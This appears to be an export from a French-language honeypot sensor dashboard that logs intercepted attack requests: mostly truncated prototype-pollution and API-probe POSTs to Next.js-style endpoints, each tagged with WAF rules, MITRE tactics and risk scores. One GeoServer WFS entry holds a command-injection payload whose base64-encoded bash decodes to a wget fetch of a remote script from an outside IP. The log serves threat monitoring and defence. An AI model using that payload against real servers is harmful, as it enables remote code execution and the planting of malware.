User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Fire
Requête brute (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e08 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST / UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/1
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857376 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Fire
Requête brute (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e08 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /api | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /api UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/api
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST / UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/1
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857376 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /api | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /api UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/api
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST / UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/1
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857376 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 8080 · HTTP | http | Injection de commande cmd injection · via HTTP:8080 · (tentative d'exploit) · → /geoserver/wfs | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /geoserver/wfs UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
42
Recommandation
Investiguer
Tags
Cible HTTP
GET
/geoserver/wfs
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/geoserver/wfs
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0782
pat-0144
pat-0145
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932190 php system
CRS 932190
CRS 932200
CRS 932205
CRS 932206
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
rce-0
rce-3
nosqli-3
php-rce-passthru
Payload (extrait)
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runti
Requête brute (extrait)
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0 |
|||||||
| TCP | 3002 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3002 · (tentative d'exploit) · → /api | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /api UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3002
Chemin / cible
/api
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3002 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3002 · (tentative d'exploit) · → /_next/server | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next/server UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next/server
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3002
Chemin / cible
/_next/server
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/201001
Requête brute (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf5 |
|||||||
| TCP | 3001 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3001 · (tentative d'exploit) | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST / UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3001
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 70
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/1
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857376 |
|||||||
| TCP | 3000 · HTTP | http | Énumération API REST rest api enum · via HTTP:3000 · (sonde / probe) · → /api/route | Élevée | Élevé · 66 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
POST /api/route UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/route
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/api/route
Service
HTTP
Pourquoi cette classification : Énumération API REST (tag sqli-4) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 66
Confiance : Confiance 50 % — 9 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Api Probe Generic
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api/route HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101
Requête brute (extrait)
POST /api/route HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df |
|||||||
| TCP | 3000 · HTTP | http | Énumération API REST rest api enum · via HTTP:3000 · (sonde / probe) · → /api/route | Élevée | Élevé · 66 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
POST /api/route UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/route
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/api/route
Service
HTTP
Pourquoi cette classification : Énumération API REST (tag sqli-4) · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 66
Confiance : Confiance 50 % — 9 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Api Probe Generic
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api/route HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101
Requête brute (extrait)
POST /api/route HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next/server | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next/server UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next/server
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next/server
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/201001
Requête brute (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf5 |
|||||||
| TCP | 3001 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3001 · (tentative d'exploit) · → /_next/server | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next/server UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next/server
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3001
Chemin / cible
/_next/server
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 70
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/201001
Requête brute (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf5 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /api | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /api UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/api
Service
HTTP
